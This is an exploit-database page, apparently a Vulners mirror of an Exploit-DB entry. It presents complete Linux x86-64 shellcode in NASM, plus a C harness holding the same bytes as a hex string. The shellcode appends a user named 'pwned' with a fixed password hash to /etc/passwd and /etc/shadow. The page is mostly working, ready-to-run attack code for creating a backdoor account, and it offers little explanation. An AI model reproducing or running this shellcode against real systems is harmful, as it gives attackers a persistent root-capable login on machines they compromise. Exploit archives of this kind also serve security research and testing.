Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux/x86-64 - Add User (pwned/$pass$) Using open,write,close To /etc/{passwd,shadow} Shellcode (358 bytes)

🗓️ 01 Jan 2009 00:00:00Reported by Exploit-DBType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 23 Views

Linux Shellcode for Adding User and Password using open, write, close to /etc/passwd and /etc/shadow file

Code
; shellcode name add_user_password_JCP_open,write,close
; Author    : Christophe G SLAE64-1337
; Len       : 358 bytes
; Language  : Nasm
; "name = pwned ; pass = $pass$"
; add user and password with open,write,close
; tested kali linux , kernel 3.12


global _start

_start:

       xor rax , rax
       push rax
       pop rsi
       push rax                                       ; null all register used for open syscall
       pop rdx
       add al , 0x2
       mov rdi , 0x647773ffffffffff
       shr rdi , 0x28
       push rdi                                       ; "/etc/passwd"
       mov rdi , 0x7361702f6374652f
       push rdi
       mov rdi , rsp
       mov si , 0x441
       mov dx , 0x284
       syscall                                        ; open syscall

       xor edi , edi
       add dil , 0x3

jmp short findaddress                                   ; I placed the jmp short here size of code is too lenght for jmp short if placed in head 

_respawn:

       pop r9
       mov  [r9 + 0x30] , byte 0xa                     ; terminate the string 
       lea rsi , [r9]   ; "pwned:x:1001:1002:pwned,,,:/home/pwned:/bin/bash'    
       mov al , 0x1                                    
       xor rdx , rdx
       add rdx , 0x31
       syscall                                         ; write syscall

       xor edi , edi
       add dil , 0x3
       push rdi                                  
pop rax
       syscall                                         ; close syscall

       xor rax , rax
       push rax
       pop rsi
       add al , 0x2
       mov rdi , 0x776f64ffffffffff                   ; open '/etc/shadow'
       shr rdi , 0x28
       push rdi
       mov rdi , 0x6168732f6374652f
       push rdi
       mov rdi , rsp
       mov si , 0x441
       mov dx , 0x284
       syscall                                       ; open syscall


       xor rax , rax
       add al , 0x1
       xor edi , edi
       add dil , 0x3
       lea rsi , [r9 + 0x31]                      ;  "pwned:$6$uiH7x.vhivD7LLXY$7sK1L1KW.ChqWQZow3esvpbWVXyR6LA431tOLhMoRKjPerkGbxRQxdIJO2Iamoyl7yaVKUVlQ8DMk3gcHLOOf/:16261:0:99999:7:::", 0xa
       push rax
       pop rdx
       add dl , 0x83
       syscall                                    ; write syscall 

       xor edi , edi
       add dil , 0x3
       push rdi
       pop rax
       syscall




       xor rax , rax
       add al , 0x3c                             ;   exit (no matter value of exit code)
       syscall


     findaddress:
        call _respawn
        string : db "pwned:x:1001:1002:pwned,,,:/home/pwned:/bin/bashApwned:$6$uiH7x.vhivD7LLXY$7sK1L1KW.ChqWQZow3esvpbWVXyR6LA431tOLhMoRKjPerkGbxRQxdIJO2Iamoyl7yaVKUVlQ8DMk3gcHLOOf/:16261:0:99999:7:::",0xa



#include <stdio.h>
#include <string.h>

unsigned char code[] = \
"\x48\x31\xc0\x50\x5e\x50\x5a\x04\x02\x48\xbf\xff\xff\xff\xff\xff\x73\x77\x64\x48\xc1\xef\x28\x57\x48\xbf\x2f\x65\x74\x63\x2f\x70\x61\x73\x57\x48\x89\xe7\x66\xbe\x41\x04\x66\xba\x84\x02\x0f\x05\x31\xff\x40\x80\xc7\x03\xeb\x74\x41\x59\x41\xc6\x41\x30\x0a\x49\x8d\x31\xb0\x01\x48\x31\xd2\x48\x83\xc2\x31\x0f\x05\x31\xff\x40\x80\xc7\x03\x57\x58\x0f\x05\x48\x31\xc0\x50\x5e\x04\x02\x48\xbf\xff\xff\xff\xff\xff\x64\x6f\x77\x48\xc1\xef\x28\x57\x48\xbf\x2f\x65\x74\x63\x2f\x73\x68\x61\x57\x48\x89\xe7\x66\xbe\x41\x04\x66\xba\x84\x02\x0f\x05\x48\x31\xc0\x04\x01\x31\xff\x40\x80\xc7\x03\x49\x8d\x71\x31\x50\x5a\x80\xc2\x83\x0f\x05\x31\xff\x40\x80\xc7\x03\x57\x58\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\x87\xff\xff\xff\x70\x77\x6e\x65\x64\x3a\x78\x3a\x31\x30\x30\x31\x3a\x31\x30\x30\x32\x3a\x70\x77\x6e\x65\x64\x2c\x2c\x2c\x3a\x2f\x68\x6f\x6d\x65\x2f\x70\x77\x6e\x65\x64\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x70\x77\x6e\x65\x64\x3a\x24\x36\x24\x75\x69\x48\x37\x78\x2e\x76\x68\x69\x76\x44\x37\x4c\x4c\x58\x59\x24\x37\x73\x4b\x31\x4c\x31\x4b\x57\x2e\x43\x68\x71\x57\x51\x5a\x6f\x77\x33\x65\x73\x76\x70\x62\x57\x56\x58\x79\x52\x36\x4c\x41\x34\x33\x31\x74\x4f\x4c\x68\x4d\x6f\x52\x4b\x6a\x50\x65\x72\x6b\x47\x62\x78\x52\x51\x78\x64\x49\x4a\x4f\x32\x49\x61\x6d\x6f\x79\x6c\x37\x79\x61\x56\x4b\x55\x56\x6c\x51\x38\x44\x4d\x6b\x33\x67\x63\x48\x4c\x4f\x4f\x66\x2f\x3a\x31\x36\x32\x36\x31\x3a\x30\x3a\x39\x39\x39\x39\x39\x3a\x37\x3a\x3a\x3a\x0a";



int main()
{
    printf("Shellcode Length:  %d\n", (int)strlen(code));
    (*(void  (*)()) code)();
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jan 2009 00:00Current
7.1High risk
Vulners AI Score7.1
shellcodelinuxadd userpasswordopen syscallwrite syscallclose syscallexploitnasml
23